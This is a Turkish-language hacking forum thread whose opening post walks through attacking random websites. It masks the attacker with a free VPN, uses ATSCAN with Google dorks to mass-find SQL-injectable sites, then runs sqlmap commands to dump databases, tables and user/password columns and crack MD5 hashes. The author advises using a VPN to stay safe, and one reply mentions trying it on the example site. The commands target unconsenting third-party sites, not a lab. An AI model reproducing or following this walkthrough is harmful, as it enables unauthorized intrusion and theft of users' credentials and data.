İPUCU

Linux Linux İle İlgili Bilgi Paylaşım Platformu

Seçenekler

Vpnbook,Atscan,Sqlmap Geniş Konu#LinuxKulübü

16-06-2018 07:16
#1
TheHacker4 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2010
Nereden:
Eskişehir
Mesajlar:
647
Teşekkür (Etti):
49
Teşekkür (Aldı):
191
Konular:
85
Ticaret:
(0) %
#Evet arkadaşlar bugün size en baştan başlayarak dork taraması yaparak açık bulunan siteye sızma ve verilerini çekmeyi anlatıcam.

#Bendeki Kali 2018.2 versiyonudur.

#Öncelikle böyle sızma işlemleri yaparken Vpn kullanmanızı şiddetle tavsiye ediyorum olur,olmaz demeyin her zaman işinizi sağlama alın.Neyse konuya geçiyorum ilk olarak ;

Vpnbook


#Tarayıcımızı Açıp www.vpnbook.com Adresine Giriş Yapıyoruz Ardından OPENVPN Butonuna Kısmına Geçip Herhangi Birini İndiriyoruz.



#İndirdiğimiz Zip Dosyasını Açıyoruz.



#Daha sonra terminalı açıyoruz.Kodlarımız.

Kod:
cd Desktop
Kod:
ls
Kod:
openvpn "dosyaadı"
#İnen 4 tane dosyadan istediğinizi seçebilirsiniz.



#VPN'yi Kapatmak İçin Terminalde ctrl + c Tuşuna Basınız.

Atscan


#Evet arkadaşlar ilk önce terminali açıyoruz.

Kod:
cd Desktop
yada
Kod:
]cd Masaüstü
yazıyoruz.

#İndirdikten sonra zipten çıkarıyoruz.Tekrar terminale dönüyoruz.

Kod:
ls
#komutunu yazarak dosyaları görüyoruz.

Kod:
cd ATSCAN-master
#yazarak dosyaya giriyoruz.



#Arkadaşlar ben daha önce install.sh dosyasına izin verdiğim için bende yeşil gözüküyor.

Kod:
chmod +x install.sh
#Yazarak yönetici izini veriyorsunuz.

Kod:
./install.sh
daha sonra yazıyoruz ve kurulum başlıyor.Karşınıza y/n seçenekleri çıkacaktır.

#İlk 2 seçeneğe y yazıyoruz.

#Sonrakilere enterlayarak default olarak seçiyoruz.



#Daha sonra kurulum bittikten sonra karşınıza bir pencere açılcak.Burada dosyamız perl yazılım diliyle yazıldığı için terminala
Kod:
perl atscan.pl
yazıyoruz.



#Atscan'a girdikten sonra

Kod:
atscan -h
#Yazarak yardım menüsünde yapabilceklerimizi gösteriyor.

Kod:
perl atscan.pl -m 2 --dork "Dorkumuz" --level 10 --sql
#Yazarak bize sql açıklı siteleri tarıyacaktır.Burda bilmeniz gereken level 10 yazmamızın nedeni 10 tane açıklı site bulucak siz bunu 100 yaparsanız 100 site bulucaktır ama çok yazmayın google'dan ip ban yersiniz.

#Ben örnek olarak basit bir dork aratıcam siz kendiniz dork yazabilir veya elinizde daha fresh dorklar vardır bunları uygulayabilirsiniz.



#Evet arkadaşlar böyle linklerde yeşil çıkarsa o sitemizde açık vardır.


Ama eğer böyle ise o sitelerde sql açığı yoktur.



#Şimdi geçelim bulduğumuz açıklı sitenin verilerini çekmeye.

Sqlmap


#İlk önce terminali açıyoruz.

Kod:
sqlmap
yazıyoruz.



Kod:
sqlmap -h yazarak'ta bu araçla kullanabilceğimiz kod dizinlerini veriyor bize.
Kod:
sqlmap -u "sql açıklı site" --dbs komutunu yazarak db'sini istiyoruz


#Ve karşımıza dbler geliyor.



#Daha sonra yukarı ok tuşuna basarak aynı komutu getiriyoruz.

Kod:
sqlmap -u "sql açıklı site" -D (Dbnin ismi) --tables yazarak tablolarını istiyoruz


#Daha sonra aşağıdaki kodu yazıyoruz.Birden fazla tabloyu isterseniz araya "," koyun.

Kod:
sqlmap -u "sql açıklı site" -D (Dbnin ismi) -T (İstediğiniz tablonun ismi) --columns


#Ve karşımıza columns'lar geldi.Buradan istediğimiz columns'ları seçiyoruz.

Kod:
sqlmap -u "sql açıklı site" -D (Dbnin ismi) -T (İstediğiniz tablonun ismi) -C (istediğimiz columns) --dump
#Yazarak columnsları'da çekiyoruz.Benim bu örnek verdiğim site dilinden dolayı admin bilgilerine ulaşamadım ama siz bulduğunuz db'de user,pass columnslarını çektikten sonra size y/n gibi sorular sorucaktır bu sorularda passlar md5 olarak şifreli çıkıyor bunları kırmak istiyormusunuz diye soruyor "enterlayarak" default seçerek kırma işlemine başlar.

#Evet arkadaşlar bu yazımda ellmden geldiği kadar basit bir şekilde anlatmaya çalıştım eğer takılan olursa her zaman takıldığı yeri söylesin yardımcı olurum.Ve son olarak kelimeleri telaffuzda bir eksiklik yaptıysam affola ve çok saygı değer üstadlarım hatalarım varsa lütfen düzeltsin.

Konu Ceys tarafından (29-06-2018 12:00 Saat 12:00 ) değiştirilmiştir.
Fliqpy Teşekkür etti.

16-06-2018 07:38
#2
Rootcmd - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
Nebula
Yaş:
22
Mesajlar:
4.305
Teşekkür (Etti):
113
Teşekkür (Aldı):
858
Konular:
239
Ticaret:
(0) %
Eline saglik
Kullanıcı İmzası
"İnsanın özgürlüğü istediği her şeyi yapabilmesinde değil, istemediği hiçbir şeyi yapmak zorunda olmamasındadır."


16-06-2018 09:09
#3
Üyelik tarihi:
05/2018
Nereden:
Bilinmiyor
Mesajlar:
231
Teşekkür (Etti):
18
Teşekkür (Aldı):
18
Konular:
8
Ticaret:
(0) %
Yararlı konu
Ellerine sağlık
Kullanıcı İmzası
People who touch your heart are always with you.
17-06-2018 19:21
#4
TheHacker4 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2010
Nereden:
Eskişehir
Mesajlar:
647
Teşekkür (Etti):
49
Teşekkür (Aldı):
191
Konular:
85
Ticaret:
(0) %
Alıntı:
Rootcmd´isimli üyeden Alıntı Mesajı göster
Eline saglik
Alıntı:
Apex Official´isimli üyeden Alıntı Mesajı göster
Yararlı konu
Ellerine sağlık
Değerli yorumlarınız için çok teşekkür ederim.
17-06-2018 19:23
#5
Üyelik tarihi:
07/2017
Nereden:
VATAN
Yaş:
20
Mesajlar:
1.325
Teşekkür (Etti):
54
Teşekkür (Aldı):
510
Konular:
440
Ticaret:
(0) %
eline sağlık
Kullanıcı İmzası
Ben TÜRKÜM!
17-06-2018 19:29
#6
Rootcmd - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
Nebula
Yaş:
22
Mesajlar:
4.305
Teşekkür (Etti):
113
Teşekkür (Aldı):
858
Konular:
239
Ticaret:
(0) %
Eline saglik
Kullanıcı İmzası
"İnsanın özgürlüğü istediği her şeyi yapabilmesinde değil, istemediği hiçbir şeyi yapmak zorunda olmamasındadır."


22-06-2018 05:45
#7
Fliqpy - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Mesajlar:
206
Teşekkür (Etti):
29
Teşekkür (Aldı):
29
Konular:
36
Ticaret:
(0) %
Anlatımdaki siteyi daha önce denemiş ve sonuç alamamıştım.Yani ka ve pw'ye ulaşamamıştım anlatım güzel olmuş elinize sağlık
22-06-2018 12:03
#8
ksc10 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
Burdan
Mesajlar:
412
Teşekkür (Etti):
42
Teşekkür (Aldı):
147
Konular:
74
Ticaret:
(0) %
Kod:
chmod +x install.sh
Yönetici izni vermez. "install.sh" dosyasının çalıştırılabilir olmasını sağlar.

Emeğine sağlık. Ayrıntılı bir şekilde anlatmışsın. Devamını bekleriz.
Kullanıcı İmzası

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı